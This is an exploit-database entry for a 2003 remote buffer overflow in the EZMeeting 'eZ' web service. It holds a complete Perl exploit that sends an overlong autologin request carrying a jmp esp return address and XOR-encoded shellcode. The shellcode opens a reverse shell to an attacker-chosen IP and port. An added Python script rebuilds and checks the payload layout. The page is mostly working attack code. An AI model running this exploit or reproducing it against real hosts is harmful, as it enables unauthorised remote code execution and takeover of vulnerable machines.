EZMeeting 3.x – ‘EZNet.exe’ Long HTTP Request Remote Buffer Overflow

Vulnerability ID: 1054285    Vulnerability type:
Published: 2003-12-08    Updated: 2003-12-08
CVE ID: N/A
CNNVD ID: N/A
Platform: Windows    CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/23417
|Details
Vulnerability details have not been disclosed.
|Exploit
//source: http://www.securityfocus.com/bid/9167/info
//
//A problem has been identified in the handling of some types of requests by the eZ package, resulting in a buffer overrun. Because of this, it may be possible for a remote attacker to execute arbitrary code and gain unauthorized access to a vulnerable host. 

#!/usr/bin/perl -w
######################C###O###R###O###M###P###U###T###E###R######################
#   [Crpt]  universal eZ v3.3 < v3.5 remote exploit by kralor  [Crpt]           #
#-------------------------------------------------------------------------------#
# versions tested & not vulnerable: v3.0 v3.1 v3.2                              #
# versions tested & vulnerable: v3.3 v3.4 v3.5                                  #
# Cryptso.dll contains a 'static' jmp esp in eZnetwork pack from v3.3 to v3.5   #
# It is a trivial exploit, jumping to esp, then at esp we jump backward to      #
# finally reach the shellcode. The shellcode gives a reverse remote shell.      #
# Universal shellcode coded by kralor with the PEB technique.                   #
######W###W###W###.###C###O###R###O###M###P###U###T###E###R###.###N###E###T######
use IO::Socket;   # also imports Socket's inet_aton() and sockaddr_in()

print "\r\n\t   [Crpt] eZ v3.3 < v3.5 remote exploit by kralor [Crpt]\r\n";
print "\t\twww.coromputer.net && undernet #coromputer\r\n\r\n";

if(@ARGV<3||@ARGV>3) {
    print "syntax: ".$0." <victim> <your_ip> <your_port>\r\n";
    exit;
}

print "[+] Connecting to ".$ARGV[0]."\t...";

my $sock = IO::Socket::INET->new(Proto=>'tcp',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>"80");
if(!$sock) {
    print "Error\r\n";
    exit;
}

print "Done\r\n";

# 0xffe4    jmp  esp in Cryptso.dll (v3.3 v3.4 v3.5 @ 0x1004C72B)
# 0xffffedffe9  jmp  back ( $ - 4'608)

$eip        = "\x2B\xC7\x04\x10";       # 0x1004C72B, little-endian
$jmp_back   = "\xE9\xFF\xED\xFF\xFF";   # jmp rel32, displacement -4609
# universal reverse remote shell using PEB, coded by kralor.
# The stub at the front (mov cx,0x19e / xor byte [ebx],0x95 / inc ebx / loop)
# unmasks the rest of the payload with XOR 0x95 at run time, which is why the
# port and address spliced in below are XORed with 0x95 before being sent.
$shellc0deI = "\xeb\x02\xeb\x0f\x66\x81\xec\x04\x08\x8b\xec\x83\xec\x50\xe8\xef".
          "\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\x9e\x01\x80\x33\x95".
          "\x43\xe2\xfa\x7e\xe6\xa6\x4e\x26\xa5\xf1\x1e\x96\x1e\xd5\x99\x1e".
          "\xdd\x99\x1e\x54\x1e\xc9\xb1\x9d\x1e\xe5\xa5\x96\xe1\xb1\x91\xad".
          "\x8b\xe0\xd9\x1e\xd5\x8d\x1e\xcd\xa9\x96\x4d\x1e\xce\xed\x96\x4d".
          "\x1e\xe6\x89\x96\x65\xc3\x1e\xe6\xb1\x96\x65\xc3\x1e\xc6\xb5\x96".
          "\x45\x1e\xce\x8d\xde\x1e\xa1\x0f\x96\x65\x96\xe1\xb1\x81\x1e\xa3".
          "\xae\xe1\xb1\x8d\xe1\x9f\xde\xb6\x4e\xe0\x7f\xcd\xcd\xa6\x55\x56".
          "\xca\xa6\x5c\xf3\x1e\x99\xca\xca\x1e\xa9\x1a\x18\x91\x92\x56\x1e".
          "\x8d\x1e\x56\xae\x54\xe0\x08\x56\xa6\x4e\xfd\xec\xd0\xed\xd4\xff".
          "\x9f\xff\xde\xc6\x7d\xe9\x6a\x6a\x6a\xa6\x5c\x52\xd0\x69\xe2\xe6".
          "\xa7\xca\xf3\x52\xd0\x95\xa6\xa7\x1d\xd8\x97\x1e\x48\xf3\x16\x7e".
          "\x91\xc4\xc4\xc6\x6a\x45\xa6\x4e\x1c\xd0\x91\xfd\xe7\xf0\xe6\xe6".
          "\xff\x9f\xff\xde\xc6\x7d\xde\x6a\x6a\x6a\x1e\xc8\x91\xa6\x6a\x52".
          "\xd0\x69\xc2\xc6\xd4\xc6\x52\xd0\x95\xfa\xf6\xfe\xf0\x1c\xe8\x91".
          "\xf3\x52\xd0\x91\xe1\xd4\x1e\x58\xf3\x16\x7c\x91\xc4\xc6\x6a\x45".
          "\xa6\x4e\xc6\xc6\xc6\xc6\xd6\xc6\xd6\xc6\x6a\x45\x1c\xd0\x31\xfd".
          "\xfb\xf0\xf6\xe1\xff\x96\xff\xc6\xff\x97\x7d\x93\x6a\x6a\x6a\xa6".
          "\x4e\x26\x97\x1e\x40\xf3\x1c\x8f\x96\x46\xf3\x52\x97";
$shellc0deII    = "\xff\x85\xc0\x6a\xe0\x31\x6a\x45\xa6".
          "\x4e\xfd\xf0\xe6\xe6\xd4\xff\x9f\xff\xde\xc6\x7d\x40\x6b\x6a\x6a".
          "\xa6\x4e\x52\xd0\x39\xd1\x95\x95\x95\x1c\xc8\x25\x1c\xc8\x2d\x1c".
          "\xc8\x21\x1c\xc8\x29\x1c\xc8\x55\x1c\xc8\x51\x1c\xc8\x5d\x52\xd0".
          "\x4d\x94\x94\x95\x95\x1c\xc8\x49\x1c\xc8\x75\x1e\xc8\x31\x1c\xc8".
          "\x71\x1c\xc8\x7d\x1c\xc8\x79\xa6\x4e\x18\xd8\x65\xc4\x18\xd8\x39".
          "\xc4\xc6\xc6\xc6\xff\x94\xc6\xc6\xf3\x52\xd0\x69\xf6\xf8\xf3\x52".
          "\xd0\x6b\xf1\x95\x1d\xc8\x6a\x18\xc0\x69\xc7\xc6\x6a\x45\xa6\x4e".
          "\xfd\xed\xfc\xe1\xc5\xff\x94\xff\xde\xc6\x7d\xf3\x6b\x6a\x6a\x6a".
          "\x45\x95";
my $tip     = inet_aton($ARGV[1]);
my $paddr   = sockaddr_in($ARGV[2], $tip);

$paddr=substr($paddr,2,6);                  # skip sin_family: network-order port, then address
$paddr=$paddr^"\x95\x95\x95\x95\x95\x95";   # pre-XOR with the decoder key
my $rport=substr($paddr,0,2);
my $rip=substr($paddr,2,4);

# Layout of the overlong autologin= value:
#   100 NOPs | shellcode I | port | glue | ip | shellcode II | 4103 NOPs | ret (jmp esp) | 4 NOPs | jmp back
$request    = "GET /SwEzModule.dll?operation=login&autologin=".
          "\x90"x100 .$shellc0deI.$rport."\x96\x46\x52\x97".$rip.$shellc0deII.
          "\x90"x4103 .$eip."\x90"x4 .$jmp_back." HTTP/1.0\r\n\r\n";

print $sock $request;
print "[+] Sending evil request\t...";
close($sock);
print "Done\r\n";
exit;
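The exploit header only sketches the control-flow trick: the overwritten return address points at a jmp esp in Cryptso.dll, esp then points at the four NOPs followed by the five-byte jmp, and that backward displacement has to land inside the 100-byte NOP sled in front of the shellcode rather than in the 4103 bytes of fill. The Python script below is added here as an illustration; it is not part of the original exploit or of kralor's code. It rebuilds the request layout from the page's own constants, mirrors the Perl's XOR-0x95 encoding of the reverse-shell port and address, and computes where the jmp back lands. The shellcode bytes are replaced by constructed stand-ins of the same lengths (301 and 139 bytes), and the IP and port are made-up test values.

```python
"""Layout check for the jmp esp + jmp-back pattern in the exploit above."""
import socket
import struct

# Constants taken from the Perl exploit on this page.
JMP_ESP_ADDR = 0x1004C72B       # jmp esp in Cryptso.dll, as the exploit header states
XOR_KEY = 0x95                  # key of the shellcode's self-decoding stub (xor byte [ebx],0x95)
GLUE = b"\x96\x46\x52\x97"      # the four bytes spliced between $rport and $rip
FRONT_SLED = 100                # NOPs in front of the shellcode
FILL_TO_EIP = 4103              # NOPs between the shellcode and the saved return address
AFTER_EIP = 4                   # NOPs that esp points at once jmp esp executes
JMP_BACK_DISP = -4609           # rel32 inside "\xE9\xFF\xED\xFF\xFF"
PART_I_LEN, PART_II_LEN = 301, 139   # lengths of $shellc0deI and $shellc0deII


def encode_sockaddr(ip, port, key=XOR_KEY):
    """Port and address exactly as the Perl builds them: sockaddr_in bytes 2..7
    (network-order port, then the address) XORed with the decoder key."""
    raw = struct.pack("!H4s", port, socket.inet_aton(ip))
    enc = bytes(b ^ key for b in raw)
    return enc[:2], enc[2:]


def decode_sockaddr(rport, rip, key=XOR_KEY):
    """What the decoder stub recovers at run time: (ip, port)."""
    raw = bytes(b ^ key for b in rport + rip)
    return socket.inet_ntoa(raw[2:]), struct.unpack("!H", raw[:2])[0]


def jmp_rel32(disp):
    """Encode `jmp rel32`: E9 followed by a little-endian signed displacement."""
    return b"\xe9" + struct.pack("<i", disp)


def assemble_shellcode(part_i, part_ii, ip, port):
    """$shellc0deI . $rport . glue . $rip . $shellc0deII"""
    rport, rip = encode_sockaddr(ip, port)
    return part_i + rport + GLUE + rip + part_ii


def build_payload(shellcode, ret=JMP_ESP_ADDR, disp=JMP_BACK_DISP):
    """The autologin= value: sled, shellcode, fill, ret, 4 NOPs, jmp back."""
    return (b"\x90" * FRONT_SLED + shellcode + b"\x90" * FILL_TO_EIP
            + struct.pack("<I", ret) + b"\x90" * AFTER_EIP + jmp_rel32(disp))


def landing_offset(payload, disp=JMP_BACK_DISP):
    """Offset into the payload where execution arrives after
    jmp esp -> 4 NOPs -> E9: target = address after the jmp + displacement."""
    jmp_at = len(payload) - 5      # the E9 is the final five bytes
    return jmp_at + 5 + disp


def lands_in_sled(payload, disp=JMP_BACK_DISP):
    """True if the jmp back lands inside the front NOP sled."""
    return 0 <= landing_offset(payload, disp) < FRONT_SLED


if __name__ == "__main__":
    # Constructed stand-ins with the same lengths as the page's encoded parts;
    # the IP and port are made-up test values.
    sc = assemble_shellcode(b"\xcc" * PART_I_LEN, b"\xcc" * PART_II_LEN,
                            "192.168.1.10", 4444)
    payload = build_payload(sc)
    print("payload bytes:", len(payload))
    print("jmp back lands at offset", landing_offset(payload),
          "- in sled:", lands_in_sled(payload))
    print("decoded target:", decode_sockaddr(*encode_sockaddr("192.168.1.10", 4444)))
```

With the page's constants the jmp back lands 57 bytes into the front sled, which is why a displacement of -4609 pairs with 4103 bytes of fill and a 450-byte shellcode. Changing the fill, the shellcode length or the number of NOPs after the return address without recomputing the displacement moves the landing point out of the sled; lands_in_sled() flags that before anything is sent.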
